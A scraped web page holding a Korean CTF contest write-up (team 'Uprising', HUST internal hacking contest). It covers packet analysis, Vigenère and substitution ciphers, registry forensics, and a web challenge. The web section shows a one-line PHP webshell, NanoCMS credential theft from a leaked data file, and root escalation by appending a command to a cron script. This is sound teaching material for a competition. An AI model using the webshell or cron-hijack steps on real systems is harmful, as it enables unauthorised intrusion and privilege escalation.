<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>



Similar documents
Reverse01 리버싱을평소에했던사람들이 1 번문제를 ollyice 파일로실행을시켰을경우에 아래와같은계속반복만되고원하는루틴들이안나오는것을금방확인할수있을것이다. 그래서 Stud_PE 라는툴로 1 번문제를열어본다면 이것과같이 UPX 라는글자가보인다. 이 UPX 가뜻하는것

2 전개과정 지도계획 주기 주제 활동 방법 및 내용 성취수준 주제발현 브레인스토밍 유목화 1 한식 알아보기 요리법 연구하고, 학고역할분담 조리 계획하기 생명과 음식 영화감상하기 생명과 음식 토론하기 한식 식사예절 알아보기 6 음식 주제발현, 브레인스토밍, 유

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

참고 금융분야 개인정보보호 가이드라인 1. 개인정보보호 관계 법령 개인정보 보호법 시행령 신용정보의 이용 및 보호에 관한 법률 시행령 금융실명거래 및 비밀보장에 관한 법률 시행령 전자금융거래법 시행령 은행법 시행령 보험업법 시행령 자동차손해배상 보장법 시행령 자본시장과

부서: 감사담당관 정책: 행정의 투명성 제고 단위: 민원발생사전예방 1)민원심의위원 수당 70,000원*9명*3회 1, 업무추진비 5,800 5, 시책추진업무추진비 5,800 5, )민원심의 업무추진 250,000원*4회 1,000

인천광역시의회 의원 상해 등 보상금 지급에 관한 조례 일부개정조례안 의안 번호 179 제안연월일 : 제 안 자 :조례정비특별위원회위원장 제안이유 공무상재해인정기준 (총무처훈령 제153호)이 공무원연금법 시행규칙 (행정자치부령 제89호)으로 흡수 전면 개

종사연구자료-이야기방 hwp

목 차 국회 1 월 중 제 개정 법령 대통령령 7 건 ( 제정 -, 개정 7, 폐지 -) 1. 댐건설 및 주변지역지원 등에 관한 법률 시행령 일부개정 1 2. 지방공무원 수당 등에 관한 규정 일부개정 1 3. 경력단절여성등의 경제활동 촉진법 시행령 일부개정 2 4. 대

삼외구사( 三 畏 九 思 ) 1981년 12월 28일 마산 상덕법단 마산백양진도학생회 회장 김무성 외 29명이 서울 중앙총본부를 방문하였을 때 내려주신 곤수곡인 스승님의 법어 내용입니다. 과거 성인께서 말씀하시길 道 를 가지고 있는 사람과 어울려야만 道 를 배울 수 있

Ⅰ. 머리말 각종 기록에 따르면 백제의 초기 도읍은 위례성( 慰 禮 城 )이다. 위례성에 관한 기록은 삼국사기, 삼국유사, 고려사, 세종실록, 동국여지승람 등 많은 책에 실려 있는데, 대부분 조선시대에 편 찬된 것이다. 가장 오래된 사서인 삼국사기 도 백제가 멸망한지

정적으로 설치된 mod_ssl 모듈확인 동적으로 설치된 mod_ssl 모듈확인 웹서버에 설치된 모듈중 mod_so.c 를 먼저 확인후 동적으로 설치된 모듈중 mod_ssl.so 를 확인합니다. 동적으로 설치된 경우 apache 설치 디렉토리의 module 이나 libe

참여연대 이슈리포트 제 호

사무엘하 적용

정도전 출생의 진실과 허구.hwp

<C1D6BFE4BDC7C7D0C0DA5FC6EDC1FDBFCF28B4DCB5B5292E687770>

시편강설-경건회(2011년)-68편.hwp

untitled

정 관

기사스크랩 (160504).hwp

???? 1

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

1217 WebTrafMon II

(Microsoft Word - \261\333\276\262\261\342_21~40\260\255_.docx)

산림병해충 방제규정 4. 신문 방송의 보도내용 등 제6 조( 조사지역) 제5 조에 따른 발생조사는 다음 각 호의 지역으로 구분하여 조사한다. 1. 특정지역 : 명승지 유적지 관광지 공원 유원지 및 고속국도 일반국도 철로변 등 경관보호구역 2. 주요지역 : 병해충별 선단

김기중 - 방송통신심의위원회 인터넷 내용심의의 위헌 여부.hwp

<C7CFB4C3B0F8BFF828C0FCC7CFC1F6B8F8C7D1C6EDC1F6292D31302E3128C3D6C1BE292D31302E31342E687770>

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

Week13


100209_철도인권침해진상조사보고서.hwp


특허청구의 범위 청구항 1 회선 아이디 접속 시스템에 있어서, 온라인을 통해 실제 사용자 고유정보의 발급이 가능한 아이디 발급 사이트를 제공하기 위한 아이디 발급 수단; 오프라인을 통한 사용자의 회선 아이디 청약에 따라 가상의 사용자 고유정보 및 가인증 정보를 생성하고

본편 1. 소개 제품의 특장점 5 제품 모델별 특징 7 알아두면 편리한 정보 13 사용 설명서 정보 14 안전 정보 15 제품 모습 20 조작부 24 제품 전원 켜기 29 로컬로 드라이버 설치하기 30 드라이버 재설치하기 유지 관리 소모품 및 별매품 주문하기

목차 후면 패널 연결... 3 전면 패널 컨트롤... 3 리모트 컨트롤... 4 연결하기... 5 네트워크 연결... 5 문자 입력... 5 조작 설명... 6 입력... 6 설정... 6 중요! CXN은 주로 소프트웨어 기반의 제품으로 새로운 기능과 업데이트는 수시로

Assign an IP Address and Access the Video Stream - Installation Guide

래를 북한에서 영화의 주제곡으로 사용했다든지, 남한의 반체제세력이 애창한다 든지 등등 여타의 이유를 들어 그 가요의 기념곡 지정을 반대한다는 것은 더 이상 용인될 수 없는 반민주적인 행동이 될 것이다. 동시에 그 노래가 두 가지 필요조 건을 충족시키지 못함에도 불구하고

MySQL-Ch05

2 국어 영역(A 형). 다음 대화에서 석기 에게 해 줄 말로 적절한 것은? 세워 역도 꿈나무들을 체계적으로 키우는 일을 할 예정 입니다. 주석 : 석기야, 너 오늘따라 기분이 좋아 보인다. 무슨 좋은 일 있니? 석기 : 응, 드디어 내일 어머니께서 스마트폰 사라고 돈

> 1. 법 제34조제1항제3호에 따른 노인전문병원 2. 국민건강보험법 제40조제1항의 규정에 의한 요양기관(약국을 제외한다) 3. 삭제< > 4. 의료급여법 제2조제2호의 규정에 의한 의료급여기관 제9조 (건강진단) 영 제20조제1항의 규

노인복지법 시행규칙

<4D F736F F D20B3AAB4C220C4A3B1B8B0A120C0FBB4D92031B1C7>

No Title

[동고동락한다] [가슴 아프다] [비서관] 2013년 8월 19일 9.[비서관]덕에 아이가 탄생해서 [미역국] [맛있다] [처음엔 어떤 사연인 줄 몰랐었지만] 마귀와[동고동락한다]하였으니[가슴 아프다]하지만[처음엔 어떤 사연인 줄 몰랐었지만]여러 가지 말 못할 역경을

2016년 트렌드 책목차를 활용한 시장 예측.numbers

< B3E220BFB5C8ADBCD320C0CEB1C720B5E9BFA9B4D9BAB8B1E22E687770>

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

2-11Àå

歯MW-1000AP_Manual_Kor_HJS.PDF

3232 편집본(5.15).hwp

Microsoft PowerPoint - ch02_인터넷 이해와 활용.ppt

歯2019

목 차 I. 교육 계획의 기저 1 1. 경북 교육 지표 1 2. 구미 교육의 지표 2 3. 경북 및 구미 유치원 교육의 방향 3 4. 유치원 현황 4 II. 본원 교육 목표 7 1. 본원의 교육 목표 및 운영 중점 7 2. 중점 교육활동 추진 계획 8 III. 교육과정

Remote UI Guide

Mango220 Android How to compile and Transfer image to Target

StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare Cen

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

4) 이 이 6) 위 (가) 나는 소백산맥을 바라보다 문득 신라의 삼국 통 일을 못마땅해하던 당신의 말이 생각났습니다. 하나가 되는 것은 더 커지는 것이라는 당신의 말을 생각하면, 대동강 이북의 땅을 당나라에 내주기로 하고 이룩한 통 일은 더 작아진 것이라는 점에서,

PowerPoint 프레젠테이션

2014밝고고운동요부르기-수정3

2005프로그램표지

1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB

User's Guide Manual

<312E20C8F1B8C1BFB1BCAD28BCADBACFB1B8292E687770>

2 공제회 소식 노후자금, 매달 연금처럼 받으세요 신용 등급 세분화 1~2등급 1000만원 확대 회원대여 이용 한도 변경 장기저축급여 분할급여금 낮은 세율로 높은 실수령액 시중 상품보다 안정성 높아 퇴직 시점 한 번만 신청 가능 한국교직원공제회의 연금형 상품 장기저축급

<4D F736F F D E20B4DCB8BB20C1A1B0CB20B9D720C1B6C4A120B8C5B4BABEF35F76312E335F2E646F63>

¹Ì¼ú-°¢·ÐÁß¿ä³»¿ëb74öÁ¤2š


야쿠르트2010 3월 - 최종

<5BC6EDC1FD5DBFA9BCBAC0C720BFC2B6F3C0CE20C0CEB1C7C7C7C7D820C7F6C8B2B0FA20B0B3BCB1B9E6BEC82E687770>

PowerPoint 프레젠테이션

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

<BFBEBEC6C0CCB5E9C0C720B3EEC0CC2E20B3EBB7A120C0CCBEDFB1E220C7D0B1B3202D20C0DAB7E1322E687770>

cam_IG.book

Sena Device Server Serial/IP TM Version

초보자를 위한 C++

2

Dialog Box 실행파일을 Web에 포함시키는 방법

zb 2) 짜내어 목민관을 살찌운다. 그러니 백성이 과연 목민관을 위해 있는 것일까? 아니다. 그건 아니다. 목민관이 백성 을 위해 있는 것이다. 이정 - ( ᄀ ) - ( ᄂ ) - 국군 - 방백 - 황왕 (나) 옛날에야 백성이 있었을 뿐이지, 무슨 목민관이 있 었던

FileMaker 15 WebDirect 설명서

전화점검 모니터링 요원 점검 교육 및 업무 협의 경비 171 총무과 베스트친절 공무원 토론회 189 총무과 80 총무과 구의원과 구간부간 업무협의 간담회비 지급 157 총무과 직원교육업무추진관련 업무추진비 지급 174 총무과 조직관리 및 인력진단을 위한 업무

사업수혜자 계 불특정다수 불특정다수 불특정다수 여 성 불특정다수 불특정다수 불특정다수 남 성 불특정다수 불특정다수 불특정다수 예산구분 계 여 성 7(50%) 7(50%) 8(50%) 남 성 7(50%) 7(50%) 8(50%) 2011년까 지는 결산 액


아름다운 세상 ~04

<C6EDC1FD20B0F8C1F7C0AFB0FCB4DCC3BC20BBE7B1D420B0B3BCB120BFF6C5A9BCF32E687770>

망되지만, 논란은 더욱 증폭될 것으로 전망된다. 일단 광주지역 민주화 운동 세력 은 5.18기념식을 국가기념일로 지정 받은 데 이어 이 노래까지 공식기념곡으로 만 들어 5.18을 장식하는 마지막 아우라로 활용한다는 계획이다. 걱정스러운 건 이런 움직임이 이른바 호남정서

< FB9AEC3A2B0FA5FC3A5C0DA2E687770>

Microsoft Word - HD-35 메뉴얼_0429_.doc

초보자를 위한 ASP.NET 2.0

CTS사보-2월

경기자 육성 프로그램 개정에 있어

- 2 - 정보 1 北 조평통, 박근혜 후보 대북정책 공약 비난 "이명박 대결정책과 다를 바 없어" 북한은 8일 새누리당 박근혜 대선 후보가 최근 발표한 대북정책 공약을 `전면대결공약'이라고 비난했다. 북한의 대남기구인 조국평화통일위원회 대변인은 이날 조선중앙통신 기자


ESET Cyber Security Pro

APOGEE Insight_KR_Base_3P11

2015년 2월 12일 사랑의 동삭교육 제 호 (2월) 년 2월 12일 사랑의 동삭교육 제 호 (2월) 6 겨울이 되면 1-4 박지예 겨울이 되면 난 참 좋아. 겨울이 되면 귀여운 눈사람도 만들고 겨울이 되면 신나는 눈싸움도 하고 겨울이

<33C6E4C0CCC1F620C1A63139C8A320B8F1C2F72E687770>

hlogin7

05Àå

hd1300_k_v1r2_Final_.PDF

빈면

Transcription:

HUST 내부해킹대회 보고서 Uprising 팀원: 이규현, 김정주, 장민석, 송진기

Network.1 문제 파일을 UltraEdit으로 열어보니 ip가 적혀있고 통신내용인 것 같은 내용들이 포함되어있어 Wireshark로 열어보니 패킷들이 캡쳐되어있었다. Wireshark에서 Follow TCP Stream을 이용해 통신 내용을 보는데 일부가 인코드된 Base64 처럼 보 여서 Base64 디코더를 이용해 적당한 코드들만 골라서 http://www.motobit.com/util/base64- decoder-encoder.asp 에서 디코드 해보았다. ---------------------------------------------통신 내용--------------------------------------------- [192.168.0.131] hello? any body hear me? [121.127.174.186] hi [192.168.0.131] who r u [121.127.174.186] i'm viginere. [121.127.174.186] oh! r u got money? [192.168.0.131] i'm viginere. [121.127.174.186] not yet. [192.168.0.131] what? i transmited last night!! [192.168.0.131] plz check agian!! [192.168.0.131] what? i transmited last night!! [121.127.174.186] wait. [192.168.0.131] now, whisper me top secret! [121.127.174.186] the key is akama [121.127.174.186] TREWEYSSFIMOIEGOWF ÖRw2W6VR à [192.168.0.131] Thax!! 처음에 key가 akama라길래 인증 프로그램에 넣어보니 답이 아니라고 해서 삽질을 좀 했다; 혹시 나해서 viginere를 검색해보니 Vigenere라는 암호법이 있다고 하여 Decrypter를 찾아보았다. http://stackoverflow.org/tools/vigenere.php 에서 Cyphertext에 TREWEYSSFIMOIEGOWF를 넣고 Key에 akama를 넣었더니 THEKEYISTIMEISGOMF라고 나왔다. 맨 끝부분 값이 이상하게 나와서 적 당히 TIMEISGOLD라고 인증프로그램에 넣었더니 답이었다.

Network.2 문제파일을 UltraEdit으로 열어보니 This program cannot be run in DOS mode 라는 문구가 있는 걸 보고 exe파일인걸 알고 확장자를.exe로 바꾸고 실행하였다. 아무런 창이이 안뜨고 프로세스만 올라와 있어 서버프로그램 같아서 Wireshark로 패킷을 캡쳐해보니 다음과 같이이 나왔다. R_U_Enjoy?를 인증프로그램에 넣었더니 답이었다.

Network.3 222.122.118.29:16511에 NC로 접속해보니 The Next key : 뒤에 임의의 값이이 포함된 것을 볼 수 있었다. 힌트에 소켓프로그래밍을 하라길래 PHP로 프로그램을 만들어보았으나나 소켓 수신이 안돼 서 실패 Python을 공부해가며 TCP/IP 통신을 하는 스크립트를 찾아 적당히 수정하였다. 처음에 데이터를 받으면 The Next key : 8EEA85B5A3A51EB556887AB7AC7527CE 와 같은 형태이 므로 받은 스트링의 The Next key : 를 로 replace하고 다시 데이터를 보냈다. 이를 10번정도 반복하다가 Good! The Next 877EE5A3576BAC5575BA2A881E8BECA5 의 형태로로 데이터를 받았다. 다시 Good! The Next 를 로 치환하고 보내면 The Next key : 의 형태로 값을 받게되는데 이 역시 위에서와 마찬가지로 로 치환하고 보내기를 반복하다 보니 Yes! Next stage is revers : 62AE7B175CECAB3A87AE585A855875BE 의 형태로 값을 받게 되었다. revers라고 써있는 것으로 봐선 문자열을 거꾸로 만들어서 보내라는 의미로 보여서 문자열 부분만 골라서 뒤집은 후 다시 보내기, The Next key : 를 치환, 문자열 뒤집기, 데이터 보내기를 반복하다보면 Auth Key is : w0rry1ng_n3v3r_ch4ng3d_4ny7h1ng 를 받을 수 있었다. w0rry1ng n3v3r_ch4ng3d_4ny7h1ng가 문 제의 답이었다.

Crypto.1 문제를 열어보니 다음과 같은 문구가 쓰여있었다. MWB IHTYRJI WM T JTYI TCC EUROIB: OXXR://ODCX.PIX/UPXBWADEI/UPXBW_1.OXYJ, XOUC EUROIB JWWL'C JULI VWEL? PW, TEXDTJ MZU NDUG! the key is : EBTGK_OTEL!!! (you must decrypt it) 먼저 OXXR://ODCX.PIX에서 OXXR이 http이면, ODCX.PIX가 hust.net인 것을 알았고, 문장의 중간 에서 한글자만 쓰이는 알파벳은 보통 a이다. 또, OXYJ가 html일 것이고, OXXR://ODCX.PIX/UPXBWADEI/UPXBW_1.OXYJ의 형태에 맞는 URL은 HUST 홈페이지에서 http://hust.net/introduce/intro_1.html 밖에 없는 것을 알 수 있었다. 이를 토대로 다음과 같은 해 독표를 작성 할 수 있었다. A B C D E F G H I J K L M N O P Q R S T U V W X Y Z d r s u c e l h n P a i o t m 이를 이용해 EBTGK_OTEL!!! 이 CRA**_HAC*!!! 임을 알 수 있었고, 게싱으로 CRAZY_HACK!!! 을 넣었더니 답이었다.

Binary.1 문제파일을 UltraEdit으로 열어보니 알 수 없는 내용들이 있어 내용을 면밀히 보다가 ASCII로 key 를 검색하다 보니 The key is http://www.yes24.com/24/goods/4447549 라는 부분을 발견 할 수 있었다. 책제목이 답인줄 알고 인증프로그램에 넣었다가 아니라길래 이걸 영어로 써야하나 하 고 당황했는데 그냥 http://www.yes24.com/ /24/goods/4447549를 넣어보니 답이었다.

Forensic.1 문제 : to day(2016 Sat Jun 11) ).. 나의 소장용 폴더가 사라졌다ㅠ_ ㅜ) 범인을 잡고자 CCTV를 돌려 봤지만 범인은 나를 유린하는듯이 凸 을 날리고.. USB를 빙빙 돌리며 유유히 사라지는 것만 볼 수 있었다.. 분노한 나는 모든 수단을 동원했다!! 결국... ParentIdPrefix 가 8&65e171b&0 라는것을 알았다. 하 지만 이것으로는 부족하다!! key : USB의 제조사명_제품명_버전번호 일단, 문제파일을 UltraEdit으로 열어보니 HIVE.tar 라는 부분이 보여 압축파일일 수 있다는 생각 에 압축프로그램으로로 열어보니 HIVE.tar라는 파일이 압축되어있었다 다. HIVE.tar를를 압축해제 하자 총 7개의 파일이 보였는데 문제 힌트가 registry 복구여서 REGA라는 리를 열고 복구를 시도했다. 프로그램을을 이용해서 레지스트 그 중에 SYSTEM에 저장 장치 정보가 있어 살펴보던 중 USB 장치중에 ParentIdPrefix 8&65e171b&0인 장치를 찾을 수 있었다. USB 장치들의 이름 규칙을 보면 제조사 제품명 USB Device 이므로 제조사는 LGE이고, USB DRIVE 가 제품명임을 알 수 있었다. 이제 버전번호만 찾으면 됐는데, 처음엔 Driver Version을 말 하는 줄 알고 LGE_USB_DRIVE_5.1.2535.0를 인증프로그램에 넣어보니 답이 아니었다. 여러 삽질을 하던 끝에 장치정보가 들어있는 레지스트리의 경로에 Disk&Ven_LGE&Prod_USB_Drive&Rev_1100 가 포함되어있어 설마 revision 었다; 값이 버전이겠어 하고 LGE_USB_DRIVE_1100 으로 넣었더니 답이

Search 일단 서치문제를 보고서 icmp에 있는 어떤 기능을 이용하여 보안 쪽에 관련된 단어라는 것을 생 각하였다. 문제에서의 Bob와 Alice 두 사람만이 data를 볼 수 있다기에 일단 필터링 같은 단어를 생각해 보았다. 여러가지 단어를 찾아 보았지만 비슷한 개념의 단어는 쉽게 찾을 수 없었다. 문제에서 icmp packet에 대해 알고 있냐고 물었기에 packet이 반드시 들어간 단어인 줄 알고 계 속 시간만 낭비하였다. 그러다가 문제에서 두 사람만이 볼 수 있다고 하는 부분을 그림으로 이미 지한 단어들을 찾기 시작했다. 그렇게 찾은 것이 tunneling이다. tunneling은 인터넷을 사적이며 안전한 네트워크의 일부로서 사용하는 것으로서, 한 네트워크에서 다른 네트워크의 접속을 거쳐 데이터를 보낼 수 있도록 하는 기술을 말한다. 여기서 "터널"이란 어떤 회사의 메시지나 파일이 인터넷을 통해 이동할 수 있도록 하기 위해 제안되었다. 이것은 회 사들이 광역통신망 구축을 위해 더 이상 전용회선을 필요로 하지 않는다는 것과, 공중 네트워크 를 안전하게 이용할 수 있다는 것을 의미한다.

Web 문제 주소를 열어보니 Phake Organization 이라는 웹사이트가 있었고, Blog 메뉴를 눌러보니 한 블로그가 나왔다. 뭔가 뚫을만한 요소가 뭐가 있는지 살펴보았는데 가능성 있는 것들 중에는 (1) SquirrelMail (2) 블로그에서 쓰는 NanoCMS 가 있었다. 처음엔 SquirrelMail를 중점으로 두고 취약점들을 찾아봤는데 로컬에서 조작해서 뭔가 를 하는 것 외에는 HTML 태그 필터링을 안해서 XSS를 시도할 수 있는 것 밖엔 없었다. 혹시나 하는 마음에 XSS를 시도해놓았으나 아무것도 건지지 못했다-_-; 남은건 NanoCMS였는데 취약점을 찾아보니 data/pagesdata.txt에 로그인 계정과 패스워드가 남는 다고 한다. 그래서 /~andy/data/pagesdata.txt를 들어가보니 다음과 같은 코드를 발견 할 수 있었 다. "username";s:5:"admin";s:8:"password";s:32:"1adbb3178591fd5bb0c248518f39bf6d"; password값이 해쉬값이라길래 그냥 1adbb3178591fd5bb0c248518f39bf6d 라고 검색해 보았더니 asdf1234 라고 한다. (나중에 보니 패스워드가 주기적으로 바뀌는 것 같았다.) 위에서 구한 계정 아이디와 패스워드로 로그인해 Admin Panel에 접근할 수 있었다. 메뉴들을 살펴보았는데 딱히 특별한 것이 없었고 New Page에서 PHP코드를 넣고 그 페이지에 접 속하면 PHP코드가 실행되는 것을 확인하고 다음과 같은 간단한 웹쉘을 만들었다. <pre> <?php system($_get['cmd']);?> </pre> 이 웹쉘을 이용해 url/~andy/index.php?page=test&cmd=[command] 로 명령어를 입력할 수 있었 다. (원래 리버스텔넷을 사용하였는데 갑자기 노트북이 블루스크린이 떠서 꺼진 이후로 잘 접속이 안되어 그냥 포기하고 웹쉘만 이용하였다.) 디렉토리 어딘가에 key.txt가 있다길래 find / -name key.txt 로 찾아보았으나 존재 하지 않았다. 삽질을 하던 끝에 힌트가 하나 더 나왔는데 /root에 key.txt가 있어 root 권한이 있어야만 보인다 는 것이었다. 일단 root권한을 따기 위해 익스플로잇을 떠올렸는데 uname a를 해보니 Linux ubuntu10 2.6.35-22-generic-pae #35-Ubuntu SMP Sat Oct 16 22:16:51 UTC 2010 i686 GNU/Linux

라고 떴고, 2.6.35용 익스플로잇은 없었다. 한참을 고민하고 검색을 한 결과 root권한으로 실행되 고 있는 프로세스의 취약점을 이용하면 된다는 것을 알게 되었다. 그래서 ps elf로 root권한으로 실행되는 프로세스를 찾던 중 cron을 발견하고 검색해보니 주기적으로 명령 실행하는 프로그램이 라고 한다. 따라서 /root/key.txt를 다른 곳에 복사하는 스크립트를 쓰고 기다렸다가 복사된 파일 을 열어보면 되는 것이다! /etc/crontab을 tail로 보니 /var/www/events/scripts/cron-curl.sh가 짧은 시간 동안 반복적으로 실 행되도록 설정되어있었고, /var/www/events/scripts/cron-curl.sh에 한 줄을 추가하면 되는데 웹쉘 을 이용하고 있어서 vi는 쓸 수가 없었다. 고심하던 끝에 echo와 >> (Append; Redirection)를 이 용하면 된다는 것을 알았다. echo "cat /root/key.txt > /tmp/a" > /var/www/events/scripts/croncurl.sh 를 웹쉘로 실행하였고, 얼마 후 /tmp/a를 tail로 열어보니 funnnylife!@ 라고 쓰여있었다. 인증프로그램에 넣어보니 답이었다.

2024 © docsplayer.org 개인정보보호 | 약관 | 지원